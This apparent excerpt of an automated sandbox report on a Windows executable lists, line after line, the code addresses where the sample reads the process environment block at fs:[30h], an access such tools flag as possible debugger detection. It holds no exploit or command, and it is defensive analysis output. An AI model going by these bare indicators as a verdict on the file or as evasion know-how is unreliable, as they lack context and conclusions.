                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A43D4 mov eax, dword ptr fs:[00000030h]3_2_019A43D4
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A3C0 mov eax, dword ptr fs:[00000030h]3_2_0190A3C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A3C0 mov eax, dword ptr fs:[00000030h]3_2_0190A3C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A3C0 mov eax, dword ptr fs:[00000030h]3_2_0190A3C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A3C0 mov eax, dword ptr fs:[00000030h]3_2_0190A3C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A3C0 mov eax, dword ptr fs:[00000030h]3_2_0190A3C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A3C0 mov eax, dword ptr fs:[00000030h]3_2_0190A3C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019083C0 mov eax, dword ptr fs:[00000030h]3_2_019083C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019083C0 mov eax, dword ptr fs:[00000030h]3_2_019083C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019083C0 mov eax, dword ptr fs:[00000030h]3_2_019083C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019083C0 mov eax, dword ptr fs:[00000030h]3_2_019083C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BC3CD mov eax, dword ptr fs:[00000030h]3_2_019BC3CD
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019863C0 mov eax, dword ptr fs:[00000030h]3_2_019863C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E3F0 mov eax, dword ptr fs:[00000030h]3_2_0191E3F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E3F0 mov eax, dword ptr fs:[00000030h]3_2_0191E3F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0191E3F0 mov eax, dword ptr fs:[00000030h]3_2_0191E3F0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019363FF mov eax, dword ptr fs:[00000030h]3_2_019363FF
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019103E9 mov eax, dword ptr fs:[00000030h]3_2_019103E9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01920310 mov ecx, dword ptr fs:[00000030h]3_2_01920310
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A30B mov eax, dword ptr fs:[00000030h]3_2_0193A30B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A30B mov eax, dword ptr fs:[00000030h]3_2_0193A30B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A30B mov eax, dword ptr fs:[00000030h]3_2_0193A30B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FC310 mov ecx, dword ptr fs:[00000030h]3_2_018FC310
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D8324 mov eax, dword ptr fs:[00000030h]3_2_019D8324
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D8324 mov ecx, dword ptr fs:[00000030h]3_2_019D8324
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D8324 mov eax, dword ptr fs:[00000030h]3_2_019D8324
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D8324 mov eax, dword ptr fs:[00000030h]3_2_019D8324
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198035C mov eax, dword ptr fs:[00000030h]3_2_0198035C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198035C mov eax, dword ptr fs:[00000030h]3_2_0198035C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198035C mov eax, dword ptr fs:[00000030h]3_2_0198035C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198035C mov ecx, dword ptr fs:[00000030h]3_2_0198035C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198035C mov eax, dword ptr fs:[00000030h]3_2_0198035C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198035C mov eax, dword ptr fs:[00000030h]3_2_0198035C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A8350 mov ecx, dword ptr fs:[00000030h]3_2_019A8350
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019CA352 mov eax, dword ptr fs:[00000030h]3_2_019CA352
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01982349 mov eax, dword ptr fs:[00000030h]3_2_01982349
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D634F mov eax, dword ptr fs:[00000030h]3_2_019D634F
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A437C mov eax, dword ptr fs:[00000030h]3_2_019A437C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E284 mov eax, dword ptr fs:[00000030h]3_2_0193E284
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E284 mov eax, dword ptr fs:[00000030h]3_2_0193E284
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01980283 mov eax, dword ptr fs:[00000030h]3_2_01980283
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01980283 mov eax, dword ptr fs:[00000030h]3_2_01980283
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01980283 mov eax, dword ptr fs:[00000030h]3_2_01980283
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019102A0 mov eax, dword ptr fs:[00000030h]3_2_019102A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019102A0 mov eax, dword ptr fs:[00000030h]3_2_019102A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019962A0 mov eax, dword ptr fs:[00000030h]3_2_019962A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019962A0 mov ecx, dword ptr fs:[00000030h]3_2_019962A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019962A0 mov eax, dword ptr fs:[00000030h]3_2_019962A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019962A0 mov eax, dword ptr fs:[00000030h]3_2_019962A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019962A0 mov eax, dword ptr fs:[00000030h]3_2_019962A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019962A0 mov eax, dword ptr fs:[00000030h]3_2_019962A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D62D6 mov eax, dword ptr fs:[00000030h]3_2_019D62D6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A2C3 mov eax, dword ptr fs:[00000030h]3_2_0190A2C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A2C3 mov eax, dword ptr fs:[00000030h]3_2_0190A2C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A2C3 mov eax, dword ptr fs:[00000030h]3_2_0190A2C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A2C3 mov eax, dword ptr fs:[00000030h]3_2_0190A2C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190A2C3 mov eax, dword ptr fs:[00000030h]3_2_0190A2C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019102E1 mov eax, dword ptr fs:[00000030h]3_2_019102E1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019102E1 mov eax, dword ptr fs:[00000030h]3_2_019102E1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019102E1 mov eax, dword ptr fs:[00000030h]3_2_019102E1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F823B mov eax, dword ptr fs:[00000030h]3_2_018F823B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D625D mov eax, dword ptr fs:[00000030h]3_2_019D625D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906259 mov eax, dword ptr fs:[00000030h]3_2_01906259
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BA250 mov eax, dword ptr fs:[00000030h]3_2_019BA250
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BA250 mov eax, dword ptr fs:[00000030h]3_2_019BA250
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01988243 mov eax, dword ptr fs:[00000030h]3_2_01988243
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01988243 mov ecx, dword ptr fs:[00000030h]3_2_01988243
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FA250 mov eax, dword ptr fs:[00000030h]3_2_018FA250
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F826B mov eax, dword ptr fs:[00000030h]3_2_018F826B
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B0274 mov eax, dword ptr fs:[00000030h]3_2_019B0274
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904260 mov eax, dword ptr fs:[00000030h]3_2_01904260
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904260 mov eax, dword ptr fs:[00000030h]3_2_01904260
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01904260 mov eax, dword ptr fs:[00000030h]3_2_01904260
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E59C mov eax, dword ptr fs:[00000030h]3_2_0193E59C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01902582 mov eax, dword ptr fs:[00000030h]3_2_01902582
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01902582 mov ecx, dword ptr fs:[00000030h]3_2_01902582
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01934588 mov eax, dword ptr fs:[00000030h]3_2_01934588
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019245B1 mov eax, dword ptr fs:[00000030h]3_2_019245B1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019245B1 mov eax, dword ptr fs:[00000030h]3_2_019245B1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019805A7 mov eax, dword ptr fs:[00000030h]3_2_019805A7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019805A7 mov eax, dword ptr fs:[00000030h]3_2_019805A7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019805A7 mov eax, dword ptr fs:[00000030h]3_2_019805A7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019065D0 mov eax, dword ptr fs:[00000030h]3_2_019065D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A5D0 mov eax, dword ptr fs:[00000030h]3_2_0193A5D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193A5D0 mov eax, dword ptr fs:[00000030h]3_2_0193A5D0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E5CF mov eax, dword ptr fs:[00000030h]3_2_0193E5CF
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E5CF mov eax, dword ptr fs:[00000030h]3_2_0193E5CF
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019025E0 mov eax, dword ptr fs:[00000030h]3_2_019025E0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E5E7 mov eax, dword ptr fs:[00000030h]3_2_0192E5E7
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C5ED mov eax, dword ptr fs:[00000030h]3_2_0193C5ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C5ED mov eax, dword ptr fs:[00000030h]3_2_0193C5ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01996500 mov eax, dword ptr fs:[00000030h]3_2_01996500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019D4500 mov eax, dword ptr fs:[00000030h]3_2_019D4500
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910535 mov eax, dword ptr fs:[00000030h]3_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910535 mov eax, dword ptr fs:[00000030h]3_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910535 mov eax, dword ptr fs:[00000030h]3_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910535 mov eax, dword ptr fs:[00000030h]3_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910535 mov eax, dword ptr fs:[00000030h]3_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01910535 mov eax, dword ptr fs:[00000030h]3_2_01910535
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E53E mov eax, dword ptr fs:[00000030h]3_2_0192E53E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E53E mov eax, dword ptr fs:[00000030h]3_2_0192E53E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E53E mov eax, dword ptr fs:[00000030h]3_2_0192E53E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E53E mov eax, dword ptr fs:[00000030h]3_2_0192E53E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192E53E mov eax, dword ptr fs:[00000030h]3_2_0192E53E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908550 mov eax, dword ptr fs:[00000030h]3_2_01908550
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01908550 mov eax, dword ptr fs:[00000030h]3_2_01908550
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193656A mov eax, dword ptr fs:[00000030h]3_2_0193656A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193656A mov eax, dword ptr fs:[00000030h]3_2_0193656A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193656A mov eax, dword ptr fs:[00000030h]3_2_0193656A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BA49A mov eax, dword ptr fs:[00000030h]3_2_019BA49A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019344B0 mov ecx, dword ptr fs:[00000030h]3_2_019344B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198A4B0 mov eax, dword ptr fs:[00000030h]3_2_0198A4B0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019064AB mov eax, dword ptr fs:[00000030h]3_2_019064AB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019004E5 mov ecx, dword ptr fs:[00000030h]3_2_019004E5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938402 mov eax, dword ptr fs:[00000030h]3_2_01938402
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938402 mov eax, dword ptr fs:[00000030h]3_2_01938402
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01938402 mov eax, dword ptr fs:[00000030h]3_2_01938402
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FC427 mov eax, dword ptr fs:[00000030h]3_2_018FC427
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FE420 mov eax, dword ptr fs:[00000030h]3_2_018FE420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FE420 mov eax, dword ptr fs:[00000030h]3_2_018FE420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018FE420 mov eax, dword ptr fs:[00000030h]3_2_018FE420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01986420 mov eax, dword ptr fs:[00000030h]3_2_01986420
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192245A mov eax, dword ptr fs:[00000030h]3_2_0192245A
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019BA456 mov eax, dword ptr fs:[00000030h]3_2_019BA456
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193E443 mov eax, dword ptr fs:[00000030h]3_2_0193E443
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018F645D mov eax, dword ptr fs:[00000030h]3_2_018F645D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192A470 mov eax, dword ptr fs:[00000030h]3_2_0192A470
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192A470 mov eax, dword ptr fs:[00000030h]3_2_0192A470
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0192A470 mov eax, dword ptr fs:[00000030h]3_2_0192A470
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198C460 mov ecx, dword ptr fs:[00000030h]3_2_0198C460
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019A678E mov eax, dword ptr fs:[00000030h]3_2_019A678E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019B47A0 mov eax, dword ptr fs:[00000030h]3_2_019B47A0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019007AF mov eax, dword ptr fs:[00000030h]3_2_019007AF
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0190C7C0 mov eax, dword ptr fs:[00000030h]3_2_0190C7C0
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019807C3 mov eax, dword ptr fs:[00000030h]3_2_019807C3
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019047FB mov eax, dword ptr fs:[00000030h]3_2_019047FB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019047FB mov eax, dword ptr fs:[00000030h]3_2_019047FB
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0198E7E1 mov eax, dword ptr fs:[00000030h]3_2_0198E7E1
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019227ED mov eax, dword ptr fs:[00000030h]3_2_019227ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019227ED mov eax, dword ptr fs:[00000030h]3_2_019227ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019227ED mov eax, dword ptr fs:[00000030h]3_2_019227ED
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01900710 mov eax, dword ptr fs:[00000030h]3_2_01900710
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01930710 mov eax, dword ptr fs:[00000030h]3_2_01930710
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193C700 mov eax, dword ptr fs:[00000030h]3_2_0193C700
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0197C730 mov eax, dword ptr fs:[00000030h]3_2_0197C730
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193273C mov eax, dword ptr fs:[00000030h]3_2_0193273C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0193273C mov ecx, dword ptr fs:[00000030h]3_2_0193273C
